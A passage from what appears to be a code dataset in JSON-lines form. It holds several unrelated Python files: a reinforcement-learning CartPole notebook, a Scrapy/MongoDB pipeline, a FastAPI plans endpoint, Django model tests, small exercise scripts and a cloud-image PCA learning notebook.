matplotlib.pyplot as plt\nfrom utils.cartpole import CartPoleEnv\nfrom agents.q_learner import Q_learner\nfrom agents.bq_learner import BQ_learner\n\n\n# In[2]:\n\n\nargs = dict()\nargs[\"BUFFER_SIZE\"] = int(500) # replay buffer size\nargs[\"BATCH_SIZE\"] = 32 # minibatch size\nargs[\"GAMMA\"] = 0.95 # discount factor\nargs[\"TAU\"] = 1e-3 # for soft update of target parameters\nargs[\"LR\"] = 0.001 # learning rate\nargs[\"UPDATE_EVERY\"] = 4 # how often to update the network\n\nenv_name = 'CartPole-v1'\n\ndef my_product(inp):\n return (dict(zip(inp.keys(), values)) for values in product(*inp.values()))\n\n\n# In[3]:\n\n\ndef transform_dict_to_tuple(param):\n param_list = []\n if \"seed\" not in param.keys():\n param_list += [0]\n else:\n param_list += [param[\"seed\"]]\n \n if \"length\" not in param.keys():\n param_list += [0.5]\n else:\n param_list += [param[\"length\"]]\n \n if \"gravity\" not in param.keys():\n param_list += [9.8]\n else:\n param_list += [param[\"gravity\"]]\n \n if \"force_mag\" not in param.keys():\n param_list += [10.0]\n else:\n param_list += [param[\"force_mag\"]]\n return tuple(param_list)\n\n\n# In[4]:\n\n\nclass Task_Wrapper():\n def __init__(self, env_name, params):\n self.env_name = env_name\n self.params = list(my_product(params))\n self.current_param = 0\n self.seed = seed\n self.envs = []\n \n def next_task(self):\n params = self.params[self.current_param]\n params_tuple = transform_dict_to_tuple(params)\n env = CartPoleEnv(**params)\n env.seed(self.seed)\n self.current_param+=1\n self.envs.append({params_tuple : env})\n return self.envs\n \n def get_env(self, index):\n params = self.params[index]\n env = CartPoleEnv(**params)\n env.seed(self.seed)\n return env \n\nclass Queue():\n def __init__(self, capacity):\n self.capacity = capacity-1\n self.queue = []\n self.nb_elems = -1\n \n def add(self, elem):\n if self.nb_elems == self.capacity:\n self.pop()\n self.add(elem)\n else:\n self.queue.append(elem)\n self.nb_elems+=1\n \n def pop(self): \n self.nb_elems -=1\n return self.queue.pop(0)\n\n\n# In[5]:\n\n\n\ndef dqn(envs, agent = None, n_episodes=20, max_t=200, eps_start=1, eps_end=0.01, eps_decay=0.995, desactivate_noise = False):\n scores_test = [Queue(50) for i in range(len(envs))]\n scores = [] \n scores_window = deque(maxlen=100) \n eps = eps_start \n env = list(envs[-1].values())[0]\n for i_episode in range(1, n_episodes+1):\n\n state = env.reset()\n score = 0\n if desactivate_noise:\n eps = 0\n \n for t in range(max_t):\n action = agent.act(state = state,task_idx = len(envs)-1, eps = eps )\n next_state, reward, done, _ = env.step(action)\n agent.step(state, action, reward, next_state, done)\n state = next_state\n score += reward\n if done:\n break \n test_dqns(scores_test, envs, agent)\n\n score_averaged = scores_test[-1].queue[-1]\n scores_window.append(score_averaged) \n scores.append(score_averaged) \n eps = max(eps_end, eps_decay*eps)\n \n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)), end=\"\")\n if i_episode % 100 == 0:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)))\n if np.mean(scores_window)>=195.0 and i_episode>100:\n break\n print('\\nEnvironment solved in {:d} episodes!\\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_window)))\n #torch.save(agent.qnetwork_local.state_dict(), 'models/checkpoints/checkpoint.pth')\n \n scores_test_list = [np.array(scores_test[i].queue).mean() for i in range(len(scores_test)) ]\n return scores, 
scores_test_list\n\n\ndef test_dqns(scores_test, envs, agent, n_episodes = 5, max_t = 1000):\n for i in range(len(envs)):\n env_i = list(envs[i].values())[0]\n scores_test[i].add(test_dqn(env_i, agent, i, n_episodes, max_t))\n \n \ndef test_dqn(env, agent, task_idx = 0, n_episodes = 1, max_t=1000):\n _scores = 0 \n for i_episode in range(1, n_episodes+1):\n _state = env.reset()\n _score = 0\n for t in range(max_t):\n _action = agent.act(_state, task_idx, 0.0)\n _next_state, _reward, _done, _ = env.step(_action)\n _state = _next_state\n _score += _reward\n if _done:\n break \n _scores += _score \n return _scores/n_episodes\n\n\n#
Agent definition
\n\n# In[6]:\n\n\n#agent = Q_learner(state_size=4, action_size=2, seed=0, hiddens = [100,100], args = args)\nhiddens = [100,100]\n\n\n\n# In[7]:\n\n\nparams = {\"length\": [1, 10], \n \"gravity\": [9.8, 1.62],\n \"seed\":[0]\n }\n\nprint(\"Params: (Seed, Length, Gravity, Force_mag)\")\nseed = 0\ndesactivate_noise = False\ntask_wrapper = Task_Wrapper(env_name,params)\nscores = dict()\ntest_scores = dict()\nfor task_id in range(len(task_wrapper.params)):\n \n print(\"------------ Task n°{}/{} ------------\".format(task_id+1,len(task_wrapper.params) ))\n envs = task_wrapper.next_task()\n param_tuple = list(envs[-1].keys())[0]\n print(\"Current param: {}\".format(param_tuple))\n\n \n if task_id == 0 :\n print(\"Let's first train a Vanilla network\")\n vanilla_agent = Q_learner(state_size=4, action_size=2, seed=0, hiddens = hiddens,\n args = args)\n _, test_score = dqn(envs, vanilla_agent)\n print(test_score)\n weights = vanilla_agent.get_weights()\n agent = BQ_learner(state_size=4, action_size=2, seed=0, hiddens = hiddens, \n args = args, prev_means = weights)\n desactivate_noise = True\n \n print(\"We can now start using VDQNs\")\n\n scores[param_tuple], test_scores[param_tuple] = dqn(envs, agent, desactivate_noise = desactivate_noise)\n agent.next_task()\n print(test_scores[param_tuple])\n\n\n# In[ ]:\n\n\ncolumns = [\"Task#\",\"Seed\", \"Gravity\", \"Length\", \"Force_mag\", \"Episode\", \"Score\"]\ndf = pd.DataFrame(columns = columns)\nfor j,param in enumerate(list(scores.keys())):\n print(j)\n values = scores[param]\n liste = []\n\n for i in range(len(values)):\n liste.append([j, param[0], param[1], param[2],param[3], i, values[i]])\n df2 = pd.DataFrame(data = liste, columns = columns)\n df = pd.concat([df,df2])\n df.reset_index()\npath= \"results/vdqn.csv\"\ndf.to_csv(path)\n\n\n# Test error\n\n# In[ ]:\n\n\nscore_list = [np.array(list(test_scores.keys()))]\nfor key in test_scores.keys():\n \n score_list.append(np.array(test_scores[key]))\nscores= np.array(score_list)\nprint(scores)\npath= \"results/vdqn.npy\"\nnp.save(path, scores)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"aicools/Continual-learning-RL","sub_path":"Continual-learning-RL-VDQN.py","file_name":"Continual-learning-RL-VDQN.py","file_ext":"py","file_size_in_byte":7270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"15573605849","text":"#ICP 2\n#Muhammad Mohzary\n\n# A program which reads weights (lbs.) 
of N students into a list and convert these weights to kilograms in a separate list using\n\n# the convert function to convert ibs to kgs\ndef convertInput(weights):\n weightskg = []\n for w in weights:\n t = w / 2.205\n kgVal = round(t,2)\n weightskg.append(kgVal)\n return(weightskg)\n\n\n#T ask user to enter the number of students\nstudentsN = int(input(\"Please enter the number of students: \"))\n# to initi the list\nweightslbsList = []\n\n# Using loop to enter student weights\nfor x in range(studentsN):\n w = float(input(\"Please enter student number \" + str(x + 1) +\" weight: \"))\n weightslbsList.append(w)\nprint(weightslbsList)\n# To call the convert function\nprint(convertInput(weightslbsList))","repo_name":"mohzary/python-deep-learning-f19","sub_path":"ICP 2/weights.py","file_name":"weights.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"24535784634","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport pymongo\nfrom scrapy.exceptions import DropItem\nfrom scrapy import log\nimport re\nfrom scrapy.conf import settings\n\nclass HypebeastPipeline(object):\n def process_item(self, item, spider):\n item[\"sub_title\"] = re.sub(r\"[】|【|,|。|「|」|,|.|!|\||:|・|?|\\n| | |.|》|《]+\",'',item[\"sub_title\"])\n item['hype_count'] = int(item['hype_count'].replace(\",\",''))\n item[\"article\"] = ''.join([x.replace(\" \",'').replace(\"\\n\",'') for x in item[\"article\"]])\n return item\n\nclass MongodbPipeline(object):\n def __init__(self):\n\n client = pymongo.MongoClient(\n host= settings[\"MONGODB_SERVER\"],\n port=settings[\"MONGODB_PORT\"])\n\n db = client[settings[\"MONGODB_DB\"]]\n self.client = db[settings[\"MONGODB_COLLECTION\"]]\n\n\n def process_item(self,item,spider):\n valid = True\n for data in item:\n if not data:\n valid = False\n raise DropItem(\"Missing {0}!\".format(data))\n if valid:\n self.client.insert(dict(item))\n log.msg(\"Item added to MongoDB database!\",\n level=log.DEBUG, spider=spider)\n return item\n","repo_name":"unrealandychan/Spiders","sub_path":"HypeBeast/HypeBeast/HypeBeast/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"7795322769","text":"from mixer.backend.django import mixer\r\nimport pytest\r\n\r\n\r\n@pytest.mark.django_db\r\nclass TestThumbnailModel:\r\n \"\"\"Tests for Thumbnail model.\"\"\"\r\n\r\n def test_thumbnail_string_representation(self):\r\n \"\"\"Tests string representation of a model.\"\"\"\r\n test_thumbnail = mixer.blend(\"api.Thumbnail\")\r\n assert str(test_thumbnail) == f\"Thumbnail size {test_thumbnail.size}px\"\r\n\r\n\r\n@pytest.mark.django_db\r\nclass TestAccountTierModel:\r\n \"\"\"Tests for AccountTier model.\"\"\"\r\n\r\n def test_account_tier_string_representation(self):\r\n \"\"\"Tests string representation of a model.\"\"\"\r\n test_account_tier = mixer.blend(\"api.AccountTier\", name=\"test_tier\")\r\n assert test_account_tier.name == \"test_tier\"\r\n\r\n\r\n@pytest.mark.django_db\r\nclass TestExpiringLinkModel:\r\n \"\"\"Tests for ExpiringLink model.\"\"\"\r\n\r\n def test_expiring_link_string_representation(self):\r\n \"\"\"Tests string representation of a model.\"\"\"\r\n test_expiring_link = 
mixer.blend(\"api.ExpiringLink\", name=\"test_link\")\r\n assert test_expiring_link.name == \"test_link\"\r\n\r\n def test_expiring_link_get_url(self):\r\n \"\"\"Tests get_url() model method.\"\"\"\r\n test_expiring_link = mixer.blend(\"api.ExpiringLink\")\r\n assert test_expiring_link.get_url() == \"/api/expiringlink/1/\"\r\n\r\n\r\n@pytest.mark.django_db\r\nclass TestImageModel:\r\n \"\"\"Tests for Image model.\"\"\"\r\n\r\n def test_account_tier_string_representation(self):\r\n \"\"\"Tests string representation of a model.\"\"\"\r\n test_image = mixer.blend(\"api.Image\", name=\"test_image_name\")\r\n assert test_image.name == \"test_image_name\"\r\n","repo_name":"levy5434/ImageAPI","sub_path":"api/tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"9906273433","text":"class Weapon:\n def __init__(self, name, attack_power):\n self.name = name\n self.attack_power = attack_power\n\n\n\n \n \n\n def weapon_select(self):\n weapon1 = Weapon(\"The Toilet Brush of Death\", 15)\n weapon2 = Weapon(\"A Dumptruck Full of Microwaves\", 20)\n weapon3 = Weapon(\"The Rock of Freedom\", 15)\n\n weapon_selector = input(f\"Please Choose your weapon. Press 1 for {weapon1.name}. Press 2 for {weapon2.name}. Press 3 for {weapon3}\")\n if weapon_selector == \"1\":\n print(f\"You have choosen {weapon1}\")\n self.active_weapon = weapon1\n elif weapon_selector == \"2\":\n print(f\"You have choosen {weapon2}\")\n self.active_weapon == weapon2\n else:\n print(f\"You have selected {weapon3}\")\n self.active_weapon == weapon3\n ","repo_name":"sTuckerCurtin/Robots_VS-_Dinosaurs","sub_path":"weapon.py","file_name":"weapon.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"16958022351","text":"import vtk\nimport vtkbone\nimport os\nimport argparse\n\n\n#Convert DICOM to MHA and AIM\n# Parse input arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"filePath\",\n type=str,\n help=\"The filepath\")\nparser.add_argument(\"outputImage\",\n type=str,\n help=\"The output Mha image\")\nargs = parser.parse_args()\n\nfilePath = args.filePath\noutputImage = args.outputImage\n\ndicomReader = vtk.vtkDICOMImageReader()\ndicomReader.SetDirectoryName(filePath)\ndicomReader.Update()\ndicomImage = dicomReader.GetOutput()\n\nmhaWriter = vtk.vtkMetaImageWriter()\n# mhaWriter.SetDirectoryName(filePath)\nmhaWriter.SetFileName(filePath+'/'+outputImage+'.mha')\nmhaWriter.SetInputData(dicomImage)\nmhaWriter.Write()\n\n#aimWriter = vtkbone.vtkboneAIMWriter()\n#aimWriter.SetInputData(dicomImage)\n#aimWriter.SetFileName(\"summed_image.aim\")\n#aimWriter.Update()\n","repo_name":"Bonelab/DECT_BoneAnalysis","sub_path":"dicom_Converter_batch.py","file_name":"dicom_Converter_batch.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"18901095498","text":"from fastapi import APIRouter, UploadFile, File, status, HTTPException\nfrom datetime import date\nfrom typing import List\nimport pandas as pd\n\nfrom schemas import IssuancePlanPerformance, GatherPlanPerformance, Success\nfrom crud import plan_exists, insert_plans, get_plans, get_dictionary_id, get_credits_body, get_payments_sum_by_date\nfrom models import Plan\nfrom helpers.types import to_date\n\nplans_router = 
APIRouter()\n\n@plans_router.post('/plans_insert')\nasync def post_plans(file: UploadFile = File(...)) -> Success:\n if not file.filename.endswith('.xlsx'):\n raise HTTPException(status.HTTP_400_BAD_REQUEST, detail='File format must be .xlsx')\n \n df = pd.read_excel(await file.read(), converters={0: lambda x: x.date(), 1: str, 2: float})\n\n plans: List[ dict[str, date | str | float ] ] = []\n for row in df.itertuples():\n plan_date: date = row[1]\n plan_name: str = row[2]\n plan_sum: float = row[3]\n plans.append( { 'period': plan_date, 'name': plan_name, 'sum': plan_sum })\n\n plan_models: List[Plan] = []\n for plan in plans:\n plan_period, plan_name, plan_sum = plan.values()\n \n if plan_period.day != 1:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail='Invalid period. Must be 1 day of month')\n \n if pd.isna(plan_sum):\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=f'Invalid plan sum')\n\n category_id = await get_dictionary_id(plan_name) \n if not category_id:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=f'No such category \\'{plan_name}\\'')\n \n if await plan_exists(plan_period, category_id):\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=f'The plan with period {plan_period} and category \\'{plan_name}\\' already exists in database')\n \n plan_models.append(Plan(period=plan_period, sum=plan_sum, category_id=category_id))\n\n plan_ids = await insert_plans(plan_models)\n\n return Success(values=plan_ids)\n\n\n@plans_router.get('/plans_performance')\nasync def get_plans_performance(year: int, month: int, day: int) -> List[IssuancePlanPerformance | GatherPlanPerformance]:\n try:\n for_date = date(year, month, day)\n except ValueError as ex:\n raise HTTPException(status.HTTP_400_BAD_REQUEST, detail=str(ex))\n plans_performance = []\n for plan in await get_plans(for_date):\n if plan.category.lower() == 'видача':\n issuance_sum = await get_credits_body(plan.period, for_date)\n complete_percent = issuance_sum / plan.sum * 100\n plan_performance = IssuancePlanPerformance(month=for_date.month, category=plan.category, sum=plan.sum, given_sum=issuance_sum, complete_percent=complete_percent)\n elif plan.category.lower() == 'збір':\n payments_sum = await get_payments_sum_by_date(plan.period, for_date)\n complete_percent = payments_sum / plan.sum * 100\n plan_performance = GatherPlanPerformance(month=for_date.month, category=plan.category, sum=plan.sum, gathered_sum=payments_sum, complete_percent=complete_percent)\n else:\n continue\n plans_performance.append(plan_performance)\n return plans_performance\n\n","repo_name":"Mlinzo/finance_api","sub_path":"app/routes/plans.py","file_name":"plans.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"12860767752","text":"import json\n\nwith open(r\"C:\\Users\\vashi\\OneDrive\\Documents\\GitHub\\DS140823\\_23_json_file_handling\\demo.json\") as file:\n \n # reading json file and converting json data into dict\n data = json.load(file)\n print(data)\n print(type(data))\n\n\nwith open(r\"C:\\Users\\vashi\\OneDrive\\Documents\\GitHub\\DS140823\\_23_json_file_handling\\test.json\",\"w\") as file:\n data = {\n \"rno\":1,\n \"name\":\"Raj\",\n \"male\":True\n }\n # converted dict into json and stored it inside json file\n 
json.dump(data,file)\n","repo_name":"Sherly14/DS140823","sub_path":"Python/_23_json_file_handling/_2_json_file_reading_writing.py","file_name":"_2_json_file_reading_writing.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"7017251093","text":"\n\"\"\"\nThis gets the meta-data containing filenames, location in MB on where to start\nand the filesize\n\nThis is embedded in an iterative loop over process rank to decide which files\nand or chunks of files to send to each process\n\nInitial plan was to include the MPI send/recv here.\nKept this part wrapped to make more modular/easier to read\n\"\"\"\n\nimport os\nfrom mpi4py import MPI\n\ndef partitionMetaData(maxReadSize, input_dir, input_files, fCount_init, chunk, AddedFiles):\n\t\n\trunningFileSize = 0.0\n\tfCount = fCount_init\n\tNfiles = len(input_files)\n\n\tfilesnames_tmp = []\n\tbyteStart_tmp = []\n\tfilesize_tmp = []\n\t\n\twhile runningFileSize < maxReadSize:\n\t\tcurrentFileSize = os.path.getsize(input_dir + input_files[fCount])\n\t\t\n\t\tif chunk*maxReadSize < currentFileSize:\t\t### starts from chunk*maxReadSize and reads next\n\t\t\tfilesnames_tmp.append(input_files[fCount])\t### 10 MB for large files\n\t\t\tbyteStart_tmp.append((chunk - 1)*maxReadSize)\n\t\t\tfilesize_tmp.append(currentFileSize)\n\t\t\t\n\t\t\tchunk += 1\n\t\t\tAddedFiles = True\n\t\t\t\n\t\t\tif chunk*maxReadSize > currentFileSize: # dump rest of file here if there is < 10MB remaining\n\t\t\t\tfilesnames_tmp.append(input_files[fCount])\n\t\t\t\tbyteStart_tmp.append((chunk -1)*maxReadSize)\n\t\t\t\tfilesize_tmp.append(currentFileSize)\n\t\n\t\t\t\tfCount += 1\n\t\t\t\tAddedFiles = True\n\t\t\t\tif fCount >= Nfiles:\n\t\t\t\t\tbreak\n\t\t\t\tchunk = 1\n\t\t\tbreak\n\t\telse:\n\t\t\tfilesnames_tmp.append(input_files[fCount])\t## File is < 10 MB in size, add whole file\n\t\t\tbyteStart_tmp.append((chunk-1)*maxReadSize)\n\t\t\tfilesize_tmp.append(currentFileSize)\n\t\t\tfCount += 1\n\t\t\trunningFileSize += currentFileSize\n\t\t\tAddedfiles = True\n\t\t\tif fCount >= Nfiles:\n\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\n\treturn filesnames_tmp, byteStart_tmp, filesize_tmp, fCount, chunk, AddedFiles\n","repo_name":"DiegosNore/Telematica4","sub_path":"src/partitionMetaData.py","file_name":"partitionMetaData.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"28701889921","text":"from functools import reduce\n\nwith open(\"input.txt\") as input_file:\n nums = [int(n) for n in input_file.read().split(\",\")]\n fuel_vals = []\n for i in range(min(nums), max(nums) + 1):\n fuel = 0\n for n in nums:\n dist = abs(i - n)\n step = sum(range(dist))\n fuel += dist + step\n fuel_vals.append(fuel)\n print(min(fuel_vals))\n","repo_name":"niklasschloegel/advent-of-code","sub_path":"2021/day-07/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"17295625490","text":"# (https://leetcode.com/problems/find-all-duplicates-in-an-array/\n\nnums = [4,3,2,7,8,2,3,1]\n\nx=[]\nfor i in nums:\n if nums.count(i)>1:\n x.append(i)\nprint(set(x))\n\n\nres = set()\nunique = set()\nfor number in nums:\n if number not in unique:\n unique.add(number)\n else:\n res.add(number)\nprint(list(res))\n\n\n#alternative\n\ndef findDuplicates(nums):\n res=[]\n for i in nums:\n if 
nums[abs(i)-1]<0:\n res.append(abs(i))\n else:\n nums[abs(i)-1]=-nums[abs(i)-1]\n return res\n\n \n \n\n\n\n\n","repo_name":"riaz-khan-16/Problem_Solving_with_Python","sub_path":"5_Leetcode_Sorting/41.find-all-duplicates-in-an-array.py","file_name":"41.find-all-duplicates-in-an-array.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"70959560178","text":"input_list = input().split(\" \")\r\ncount_shuffles = int(input())\r\n\r\nworking_list = input_list.copy()\r\nloop_number = len(working_list)\r\nloop_number = int(loop_number/2)\r\nshuffle_list = []\r\nlist_a = []\r\nlist_b = []\r\n\r\n\r\nfor i in range(0, count_shuffles):\r\n list_a = working_list[0:loop_number]\r\n list_b = working_list[loop_number:]\r\n shuffle_list = []\r\n for index in range (0, loop_number):\r\n shuffle_list. append(list_a[index])\r\n shuffle_list. append(list_b[index])\r\n working_list = shuffle_list\r\n\r\nprint(working_list)","repo_name":"nikolay-parapanov/SoftUni","sub_path":"02- Fundamentals/03- Exercise- Lists Basics/05. Faro Shuffle.py","file_name":"05. Faro Shuffle.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"38549463367","text":"# ---\n# jupyter:\n# jupytext:\n# cell_metadata_filter: K,title,incorrectly_encoded_metadata,-all\n# formats: ipynb,py:percent\n# text_representation:\n# extension: .py\n# format_name: percent\n# format_version: '1.3'\n# jupytext_version: 1.14.5\n# ---\n\n# %%\n#================ PART II ================#\n\n# %%\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xarray as xr\nimport os\n\nfrom tqdm import tqdm\nfrom math import trunc\n\nimport ML\n\n#The cloud dataset, 6go, np arrays 30+go\n#https://www.kaggle.com/datasets/christianlillelund/the-cloudcast-dataset?resource=download\n\n#The cloud dataset : dataset of suboptimal npy arrays to dataarray\n\n#Edited dataset after npy_to_dataarray.py computation\n#Data is now structured in 2 datasets for learning :\n #merged_darray_labels regroups the masked array of every cloud images by labels\n #Shapes info :\n #Time : roughly 365*24*4/15 files, ie one image every 15min\n #Label : the type of cloud, defined by its altitude\n #x : longitude coordinate\n #y : lattitude coordinates\n \n #merged_darray_borders regroups the borders of every cloud images by labels\n #Shapes info :\n #Time : roughly 365*24*4/15 files, ie one image every 15min (0-)\n #Label : the type of cloud, defined by its altitude (0-12)\n #x : longitude coordinate (0-767)\n #y : lattitude coordinates (0-767)\n \n\"\"\"\nSpecify the absolute path of the 'Project' folder location :\n\"\"\"\nabs_path = \"D:/Machine Learning/Project\"\n\npath_labels = abs_path+\"/TheCloudDataset_labelized_arrays_train\"\npath_borders = abs_path+\"/TheCloudDataset_labelized_borders_train\"\n\nfiles = [os.path.join(path_labels, f) for f in os.listdir(path_labels) if f.endswith(\".nc\")]\narray = np.load(abs_path+\"/The cloud dataset/2017M01/0.npy\")\n\n# %%\nfig, ax = plt.subplots(4,8)\nfor k in range(32):\n if k<=15:\n plt.subplot(4,8,k+1)\n plt.imshow(np.load(abs_path+f\"/The cloud dataset/2017M01/{k*96}.npy\"), cmap='cool')\n plt.title(f\"{k+1}/01/2017\")\n if k<=15:\n plt.subplot(4,8,k+17)\n plt.imshow(np.load(abs_path+f\"/The cloud dataset/2018M01/{k*96}.npy\"), cmap='cool')\n 
plt.title(f\"{k+1}/01/2018\")\n\nplt.get_current_fig_manager().full_screen_toggle()\nplt.savefig(abs_path+\"/daily_img_2017_2018.png\")\nplt.close('all')\n\n# %%\n\"\"\"\nThe learning will follow these steps :\n 1 - PCA over every image to reduce its size and thus computation time\n 2 - 1vsAll algorithm over labels and borders\n 2bis - 1vsAll testing with the 2018 dataset (might merge it as well)\n 3 - NN over labels and borders\n 3b - NN testing with the 2018 dataset (might merge it as well)\n 4 - comparison of the algorithm results\n 4b - testin of the two algorithm over raw input (live images from the EUMETSAT)\n 5 - trying to improve the results by combining labels and borders when learning\n 5b - testing over 2018 dataset\n 5c - testing over raw input (live images from the EUMETSAT)\n \nDepending on the difficulty, file size and computation time, every step may not be acheived, if not sucessfull.\n\"\"\"\n\n# %%\n#================ 1 - PCA ================#\n\n# %%\n\ndef slice_array(array, sclices=6):\n \n arr_blur_reduced = array[::sclices, ::sclices]\n \n return arr_blur_reduced\n \n\ndef pca_array(array, k_main_components, normalization=False):\n \n array_pca, pca_info = ML.pca(array, k_main_components, normalization)\n \n return array_pca, pca_info\n\n\ndef pca_recoverArray(array_pca, pca_info):\n \n array_recover = ML.pca_recoverData(array_pca, pca_info)\n \n return array_recover\n\n\ndef compute_pca_dataset(dataset, k_main_components=50):\n \n dataarray_pca = dataset['data'].values.astype(np.float32)\n len_time, len_label, m, n = dataarray_pca.shape\n \n m, n = m//6, n//6\n \n flattened_pca_array = np.zeros((len_label, len_time//8, m*k_main_components))\n for t in tqdm(range(0, len_time, 8)):\n for l in range(len_label):\n try:\n array_pca = pca_array(slice_array(dataarray_pca[t,l,:,:]), k_main_components)[0]\n except:\n array_pca = np.zeros((m, k_main_components))\n flattened_pca_array[l, t//8, :] = array_pca.flatten()\n \n return flattened_pca_array\n\n\ndef save_pca_flattened_dataset(path_in, path_out, k_main_components=50):\n \n files = [os.path.join(path_in, f) for f in os.listdir(path_in) if f.endswith(\".nc\")]\n\n for k in tqdm(range(len(files))):\n dataset = xr.open_dataset(f\"{files[k]}\")\n flattened_pca_array = compute_pca_dataset(dataset, k_main_components)\n flattened_pca_array = xr.DataArray(flattened_pca_array, dims=('time', 'data_pca', 'label'))\n flattened_pca_array.to_netcdf(f\"{path_out}/pca_k{k_main_components}_{k}.nc\")\n \n return None\n\n# %% TEST COMPUTE PCA\ndataset = xr.open_dataset(abs_path+\"/TheCloudDataset_labelized_arrays_train/2017M01_concatenated_darray_separated_0.nc\")\narray_pca = compute_pca_dataset(dataset, k_main_components=10)\ndarray_pca = xr.DataArray(array_pca, dims=('time', 'data_pca', 'label'))\n\n# %% TEST PCA&RECOVER ARRAY\narray = xr.open_dataset(abs_path+\"/TheCloudDataset_labelized_arrays_train/2017M01_concatenated_darray_separated_0.nc\")['data'].values[0,0,:,:] \narray = slice_array(array)\n\narray_pca, array_pca_info = pca_array(array, k_main_components=30, normalization=True)\narray_pca_recovered = pca_recoverArray(array_pca, array_pca_info)\n\nl = [array, array_pca, array_pca_recovered]\nfor k in range(3):\n plt.subplot(1,3,k+1)\n plt.imshow(l[k], cmap='gray')\nplt.suptitle(\"Image 0 label 0 / PCA img / PCA img recovered\")\nplt.savefig(abs_path+\"/1b_pca_example_k30.png\")\n\n# %% TEST PCA&RECOVERS BORDER\narray = 
xr.open_dataset(abs_path+\"/TheCloudDataset_labelized_borders_train/2017M01_concatenated_darray_separated_borders_0.nc\")['data'].values[0,0,:,:] \n\narray_pca, array_pca_info = pca_array(array, k_main_components=50)\narray_pca_recovered = pca_recoverArray(array_pca, array_pca_info)\n\nl = [array, array_pca, array_pca_recovered]\nfor k in range(3):\n plt.subplot(1,3,k+1)\n plt.imshow(l[k], cmap='gray')\n\n# %% PCA COMPUTATION ARRAYS\nk_main_components = 20\npath_in = abs_path+\"/TheCloudDataset_labelized_arrays_train\"\npath_out = abs_path+f\"/TheCloudDataset_labelized_arrays_train_pca_k{k_main_components}\"\n\n#Dirty fonction calling to store the computed pca datasets\nsave_pca_flattened_dataset(path_in, path_out, k_main_components) \n\n# %% PCA COMPUTATION BORDERS\nk_main_components = 10\npath_in = abs_path+\"/TheCloudDataset_labelized_borders_train\"\npath_out = abs_path+\"/TheCloudDataset_labelized_borders_train_pca_k{k_main_components}\"\n\n#Dirty fonction calling to store the computed pca datasets\nsave_pca_flattened_dataset(path_in, path_out, k_main_components) \n\n# %%\n\"\"\" \nOver the extremely high complexity and time consumption of the computation, choices had to be made :\n(pca computation and writing duration was ~6h)\n 1) The PCA had to be very rough, with 10 k main components selected (might try 20-30 afterwards)\n 2) Data had to be reduced again : instead of 15min slices, it's now 2 hours. The impact should be small\n enough over the futur learning, and it's still better than taking instead only 2.5 months of the whole year\n instead (for the same data weight reduction) and thus missing the seasons variations\n 3) Data is now stored as non-compressed float 32, which should speed up the learning computation\n 4) Data is still stored as individual daily arrays, as merging is still to heavy :\n - As for the previous compression, there are still too many files to load in the memory\n - Lazy computation may work better on uncompressed data, but might be counter effective when\n computing the neural network learning.\n\"\"\"\n\n# %%\n#================ 2 - OneVsAll ALGORITHM ================#\n\n# %%\n\ndef data_toarray_selection(path_in, variable, sample_size=324, num_labels=13):\n \n files = [os.path.join(path_in, f) for f in os.listdir(path_in) if f.endswith(\".nc\")]\n \n #To check the length of a vector of an image (may change depending on the PCA)\n data_info = xr.open_dataset(files[0])[variable].values\n len_data = data_info.shape[-1]\n len_data_daily = data_info.shape[-2]\n \n y = np.zeros((sample_size*len_data_daily))\n X = np.zeros((sample_size*len_data_daily, len_data))\n \n print(X.shape)\n \n for t in tqdm(range(sample_size*len_data_daily)):\n X[t, :] = xr.open_dataset(files[t//len_data_daily])[variable].values[t%num_labels, t%len_data_daily, :].flatten()\n y[t] = t%num_labels\n \n return X, y\n\n\ndef OneVsAll_dataset(path_in, variable, sample_size=324, lambda_=1, num_labels=13, itterations=10):\n \n print(\"Loading of X and y\")\n X, y = data_toarray_selection(path_in, variable, sample_size, num_labels)\n print(\"X and y finished loading\")\n \n trained_theta = ML.oneVsAll(X, y, num_labels, lambda_, tol=1e-3)[1]\n \n return 